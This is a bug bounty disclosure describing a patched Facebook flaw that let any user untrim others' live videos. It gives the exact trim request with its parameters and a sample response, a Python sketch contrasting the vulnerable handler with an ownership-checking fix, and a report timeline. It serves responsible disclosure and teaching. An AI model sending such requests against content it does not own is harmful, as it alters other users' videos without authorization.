(POC) Untrim any live video on Facebook

Description

It’s possible to untrim any live video on Facebook on behalf of the owners.

Impact

This could let a malicious user untrim any live video on Facebook through a non-GraphQL endpoint.

Proof of Concept / Repro Steps

1. Obtain the target live video ID
2. Submit the following request with the video ID from step 1 (remember to update your CSRF token)

HTTP POST
/video_broadcast/trim/?new_start_seconds=0&new_end_seconds=99999999&reset_trimming=1&video_id=valueFromStep1&fb_dtsg=

Host: facebook.com

Response

{
  "__ar": 1,
  "payload": {},
  "hsrp": {
    "hblp": {
      "sr_revision": 1002775749,
      "consistency": {
        "rev": 1002775749
      }

The target live video has been untrimmed on behalf of the owners.
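The control this request bypassed, sketched as an added example (not part of the original write-up and not Facebook's code). It assumes the root cause was a missing ownership check on the trim endpoint; the store, the handler names and the sample video are hypothetical, and only the parameter names come from the request above.

```python
from dataclasses import dataclass

class Forbidden(Exception):
    """Raised when the caller may not edit the requested video."""

@dataclass
class LiveVideo:
    owner_id: str
    duration: int  # length of the full recording, in seconds
    start: int     # currently published window
    end: int

def sample_store():
    # Constructed data: alice published only 60..300 s of a 600 s broadcast.
    return {"v1": LiveVideo(owner_id="alice", duration=600, start=60, end=300)}

def apply_trim(video, params):
    """State change shared by both handlers."""
    if params.get("reset_trimming") == "1":
        video.start, video.end = 0, video.duration  # untrim
        return video
    start = int(params["new_start_seconds"])
    end = min(int(params["new_end_seconds"]), video.duration)
    if not 0 <= start < end:
        raise ValueError("invalid trim window")
    video.start, video.end = start, end
    return video

def trim_vulnerable(store, actor_id, params):
    # Trusts the client-supplied video_id. A valid CSRF token only shows the
    # request came from the actor's own session, not that the actor owns the video.
    return apply_trim(store[params["video_id"]], params)

def trim_hardened(store, actor_id, params):
    video = store.get(params["video_id"])
    # Identical error for "unknown ID" and "not the owner", so the endpoint
    # does not confirm which IDs exist.
    if video is None or video.owner_id != actor_id:
        raise Forbidden("actor may not edit this video")
    return apply_trim(video, params)

if __name__ == "__main__":
    req = {"video_id": "v1", "new_start_seconds": "0",
           "new_end_seconds": "99999999", "reset_trimming": "1"}
    print(trim_vulnerable(sample_store(), "mallory", req))
    try:
        trim_hardened(sample_store(), "mallory", req)
    except Forbidden as exc:
        print("rejected:", exc)
```

The authorization decision sits in the handler that changes state, so it holds regardless of which API surface (GraphQL or not) routes the request to it.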

Timeline:

06/10/2020: Report sent

Triaged by Facebook after 6 hours

10/10/2020: $2875 bounty awarded during BountyCon 2020 (with bonus)

21/10/2020: Patch confirmed by Facebook

Security Researcher

Ahmad Talahmeh